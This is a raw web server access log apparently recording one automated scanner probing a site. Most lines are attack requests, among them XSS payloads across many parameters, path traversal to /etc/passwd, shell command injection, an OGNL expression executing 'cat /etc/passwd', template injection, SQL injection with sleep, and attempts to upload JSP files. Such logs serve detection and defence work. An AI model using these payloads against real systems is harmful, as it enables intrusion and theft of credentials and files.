195.164.49.69 - - [18/Nov/2024:21:20:02 +0000] GET /?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:20:02 +0000] GET /?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:20:02 +0000] GET /?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:20:02 +0000] GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:20:04 +0000] GET /.mysql_history HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:20:05 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:20:06 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:20:07 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:21:20:08 +0000] GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:21:20:09 +0000] GET /actuator/dump HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:20:10 +0000] GET /setup.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:20:11 +0000] GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1 404 1187
195.164.49.69 - - [18/Nov/2024:21:20:12 +0000] GET /httptrace HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:20:14 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:20:44 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:20:45 +0000] GET /SWNetPerfMon.db.i18n.ashx?l=ijbru&v=ijbru HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:20:45 +0000] GET /module/api.php?mobile/webNasIPS HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:20:47 +0000] GET /www/setup.php HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:20:48 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [18/Nov/2024:21:20:49 +0000] GET /env HTTP/1.1 404 1077
83.212.98.101 - - [18/Nov/2024:21:20:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:21:20:50 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:20:51 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:20:52 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:21:20:52 +0000] GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:20:54 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/VVKL.css HTTP/1.1 404 1191
195.164.49.69 - - [18/Nov/2024:21:20:55 +0000] GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1 404 1122
- - - [18/Nov/2024:21:20:56 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:20:57 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:20:58 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:20:59 +0000] GET /welcome.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:20:59 +0000] GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1 404 1162
- - - [18/Nov/2024:21:21:00 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:21:02 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:21:03 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:21:04 +0000] GET /actuator/httptrace HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:21:05 +0000] GET /threaddump HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:21:07 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:21:36 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:21:38 +0000] GET /dompdf/dompdf/www/setup.php HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:21:21:38 +0000] GET /actuator/env HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:21:39 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [18/Nov/2024:21:21:40 +0000] GET /sslmgr HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:21:21:41 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:21:43 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:21:44 +0000] GET /s/2p2W0mBRwtyyCWsgSKidSFilLdZ/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:21:45 +0000] GET /SetupWizard.aspx/nTOBTIUuff HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:21:46 +0000] GET /.DS_Store HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:21:47 +0000] GET /?pretty HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:21:48 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:21:21:49 +0000] GET /actuator/threaddump HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:21:53 +0000] GET /OS/startup/restore/restoreAdmin.php HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:21:54 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:21:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:21:58 +0000] GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:22:00 +0000] GET /s/2p2W0lgqAbHcl6kpNPOuAeynQBM/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:22:03 +0000] GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1 404 1107
- - - [18/Nov/2024:21:22:04 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:22:30 +0000] GET /app?service=page/PrinterList HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:22:31 +0000] GET /js/dompdf/www/setup.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:22:32 +0000] GET /actuator;/env; HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:22:33 +0000] GET /catalog-portal/ui/oauth/verify?error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:22:34 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:22:36 +0000] GET /core HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:21:22:37 +0000] GET /_cat/indices?v HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:22:38 +0000] GET /trace HTTP/1.1 404 1079
83.212.98.101 - - [18/Nov/2024:21:22:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:21:22:39 +0000] GET /cgi-bin/config.exp HTTP/1.1 404 1096
- - - [18/Nov/2024:21:22:40 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:22:41 +0000] GET /zabbix/index_sso.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:22:42 +0000] GET /.bash_history HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:22:44 +0000] GET /api/experimental/latest_runs HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:22:46 +0000] GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:22:47 +0000] GET /mifs/asfV3/api/v2/admins/users HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:21:22:49 +0000] GET /access/set?param=enableapi&value=1 HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:22:51 +0000] GET /metrics HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:22:52 +0000] GET /logfile HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:22:54 +0000] GET /passwordrecovered.cgi?id=w9Xy7 HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:22:55 +0000] GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:22:56 +0000] GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:22:57 +0000] GET /RestAPI/ImportTechnicians HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:23:22 +0000] GET /portal/application/libraries/dompdf/www/setup.php HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:23:22 +0000] GET /message-api/actuator/env HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:21:23:23 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:23:24 +0000] GET /_all/_search HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:23:26 +0000] GET /index_sso.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:23:26 +0000] GET /.ksh_history HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:23:29 +0000] GET /api/metrics HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:23:31 +0000] GET /actuator/logfile HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:23:44 +0000] GET /sites/all/libraries/dompdf/www/setup.php HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:21:23:45 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:23:45 +0000] GET /_cluster/health?pretty HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:23:47 +0000] GET /.sh_history HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:21:23:47 +0000] GET /actuators/logfile HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:23:49 +0000] GET /vendor/dompdf/dompdf/www/setup.php HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:21:23:49 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:23:50 +0000] GET /.zsh_history HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:23:51 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:23:56 +0000] POST /integration/saveGangster.action HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:23:58 +0000] POST /_search?pretty HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:23:59 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:21:24:02 +0000] PUT /2p2XEoUbzc6t9DjAL8ya3d2rm2u.jsp/ HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:21:24:02 +0000] GET / HTTP/1.1 200 11204
- - - [18/Nov/2024:21:24:06 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:24:09 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:24:10 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:24:14 +0000] PUT /fileserver/2p2XEpDpffbc9G9RGhBvuC14ubQ.txt HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:21:24:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:24:20 +0000] POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1 404 1149
195.164.49.69 - - [18/Nov/2024:21:24:22 +0000] POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:24:27 +0000] POST /password_change.cgi HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:24:31 +0000] POST /soap.cgi?service=whatever-control;curl HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:24:35 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [18/Nov/2024:21:24:37 +0000] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1148
195.164.49.69 - - [18/Nov/2024:21:24:39 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:24:40 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:21:24:42 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:24:45 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:21:24:46 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:24:49 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:24:51 +0000] GET /2p2XEoUbzc6t9DjAL8ya3d2rm2u.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:24:51 +0000] GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:24:56 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:24:57 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:21:24:58 +0000] POST /node/1?_format=hal_json HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:25:01 +0000] POST /service/extdirect HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:25:04 +0000] GET /fileserver/2p2XEpDpffbc9G9RGhBvuC14ubQ.txt HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:21:25:06 +0000] POST /cgi-bin/supportInstaller HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:25:09 +0000] POST /api/timelion/run HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:25:11 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:25:13 +0000] POST /service/rapture/session HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:25:18 +0000] POST /mifs/.;/services/LogService HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:21:25:26 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:21:25:30 +0000] GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:21:25:34 +0000] GET /check_browser?lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:25:36 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:21:25:38 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:25:39 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:25:43 +0000] GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:25:45 +0000] POST /EemAdminService/EemAdmin HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:25:47 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:25:50 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
83.212.98.101 - - [18/Nov/2024:21:25:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:21:25:50 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:25:53 +0000] POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:25:55 +0000] POST /cgi-bin/mainfunction.cgi HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:26:00 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:21:26:05 +0000] POST /casa/nodes/thumbprints HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:26:06 +0000] POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 404 1218
195.164.49.69 - - [18/Nov/2024:21:26:08 +0000] POST /service/rest/beta/repositories/bower/group HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:21:26:12 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:26:13 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:26:17 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:26:18 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:26:19 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:26:19 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:26:19 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:26:19 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:26:19 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:21:26:19 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:26:19 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:21:26:19 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:26:19 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:26:20 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:26:41 +0000] POST /wsman HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:21:26:43 +0000] GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1160
195.164.49.69 - - [18/Nov/2024:21:26:45 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:26:47 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:21:26:48 +0000] POST /v1/backend1 HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:26:51 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:26:55 +0000] GET /client/index.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:27:00 +0000] GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:21:27:01 +0000] GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:27:04 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:27:19 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:27:21 +0000] POST /api/content/ HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:27:23 +0000] POST /fileupload/toolsAny HTTP/1.1 404 1097
